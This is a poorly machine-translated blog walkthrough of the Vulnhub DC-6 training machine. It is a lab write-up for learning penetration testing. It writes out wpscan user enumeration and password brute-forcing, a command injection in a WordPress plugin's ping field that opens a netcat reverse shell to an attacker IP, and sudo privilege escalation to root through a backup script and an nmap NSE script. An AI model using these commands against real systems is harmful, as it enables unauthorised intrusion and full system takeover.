当前位置:网站首页>Vulnhub's dc6 target
Vulnhub's dc6 target
2022-06-29 07:46:00 【lainwith】
Catalog
Introduce
series : DC( This series consists of 10 platform )
Release date :2019 year 4 month 26 Japan
difficulty : primary - intermediate
Flag: obtain root jurisdiction , And get the only flag
Study :
● wordpress Security testing
● Local code execution
● nmap Raise the right
Target address :https://www.vulnhub.com/entry/dc-6,315/
Prompt information :
- Target support Virtualbox and Vmware
- Need modification hosts file , Such as :192.168.0.142 wordy
- The password book can be obtained in the following ways , Improve test speed :
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
information gathering
The host found
arp-scan The host found
arp-scan -I eth0 -l

Host information detection
Information detection :nmap -A -p- 192.168.40.153, Only open 22 and 80 port 
Visit website
The first change hosts file , When I opened it, I saw that it was WordPress Site 
wpscan Test site
- wpscan List the user name of the site 、 account number .
Found some accounts :admin、graham、mark、sarah、jens
wpscan --url http://wordy/ -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

- wpscan Missed scanning website , No valuable information was found .
wpscan --url http://wordy/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

- wpscan Blasting website
Try according to the user name you get , And the dictionary mentioned in the range prompt , Blow up the website , Get the user name :mark, password :helpdesk01
Prepare the password dictionary :
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
Prepare user name dictionary , It is the one tested 5 Users
Start blasting :
wpscan --url http://wordy -P passwords.txt -U user.txt

Log in to the site
After logging into the website , After a simple search , Found a host ping Test site for . You can try to find out if there are any classic command execution vulnerabilities . At its worst, it can be tested “Activity monitor” Is there any vulnerability in the plug-in .
There are two buttons under the input box , After testing , the last one “Lookup” Button can cause command execution effect 
rebound shell
kali monitor :nc -nvlp 9999
Bounce order :127.0.0.1 | nc -e /bin/bash 192.168.40.129 9999
Get interactive shell:python3 -c 'import pty; pty.spawn("/bin/bash")'

information gathering
I saw something on the target plane 4 Users , Go to their home directory first 
Sensitive files found , Identity switch to graham found sudo The possibility of raising rights 
Raise the right
Switch to jens
Ideas : Find out graham It can be used jens Identity execution for
/home/jens/backups.sh, hold/bin/bashAppend to this file , And then use jens When this file is executed as, a file with jens The powers of the shell.
from /home/jens/backups.sh hear :
- Enter the corresponding path first :
cd /home/jens - hold
/bin/bashAppend to this file :echo '/bin/bash' >> backups.sh - Switch identities :
sudo -u jens ./backups.sh
After identity switching , Find that you can continue sudo Raise the right , It's really easy to raise the right 
The right is raised to root
nmap You can execute script files , You can create a file and write to it shell The order of :
echo 'os.execute("/bin/sh")' > rootshell.nse
With root You can use nmap Execute this script :
sudo nmap --script=rootshell.nse

边栏推荐
- 关于开发web场景下如何解决手机访问web跨域问题
- The table cannot be vacuumed because the cursor is open for a long time
- 道闸控制器通讯协议
- Imx6dl4.1.15 supports EIM bus (upper) - actual operation and modification.
- Two ways to write throttling - recently seen
- About the problem that the kingbasees temporary file is too large
- 1032 Sharing
- ShapeShifter: Robust Physical Adversarial Attack on Faster R-CNN Object Detector
- pycharm的虚拟环境如何共享到jupyter-lab
- TREE ALV 展开Node或者点击Toolbar按钮时DUMP(CL_ALV_TREE_BASE==============CP|SET_ITEMS_FOR_COLUMN)
猜你喜欢

Vibration signal generation and processing based on MATLAB Doppler effect

呕心沥血总结出来的MySQL常见错误以及解决方法(一)

Interviewer: why does database connection consume resources? Where are the resources consumed?

Unexpected exception ... code: Badrequest when downloading Xilinx 2018.2

How to talk about salary correctly in software test interview?

Roblox sword nine sword two

Detailed explanation of top and free commands

感知健康生活 赋能无界连接 ——为OpenHarmony 3.1生态构建贡献芯海力量

pycharm的虚拟环境如何共享到jupyter-lab

TREE ALV 展开Node或者点击Toolbar按钮时DUMP(CL_ALV_TREE_BASE==============CP|SET_ITEMS_FOR_COLUMN)
随机推荐
What you should know about databases
手把手系列---安装SpotBugs、并快速上手使用
SAP UI5 初学 ( 一 )、简介
施努卡:视觉定位系统厂家 什么是视觉定位系统
解题-->在线OJ(十三)
tf. compat. v1.global_ variables
关于开发web场景下如何解决手机访问web跨域问题
路由详解(九阳真经)
ShapeShifter: Robust Physical Adversarial Attack on Faster R-CNN Object Detector
【工控老马】基于PLC的花样喷泉设计原理详解
Appium 环境搭建
循环嵌套问题:为什么大循环在内,小循环在外可以提高程序的运行效率
AI与元宇宙擦出火花:人类失去的只有枷锁,获得的是全方面的解放
【工控老马】洗衣机PLC程序控制系统设计详解
719. 找出第 K 小的数对距离(二分)
施努卡:轮胎自动抓取安装,3D视觉定位,机器人自动抓取
How to authorize subordinates?
Markdown skill tree (6): List
[FreeRTOS] interrupt mechanism
Simulation analysis of sailing dynamics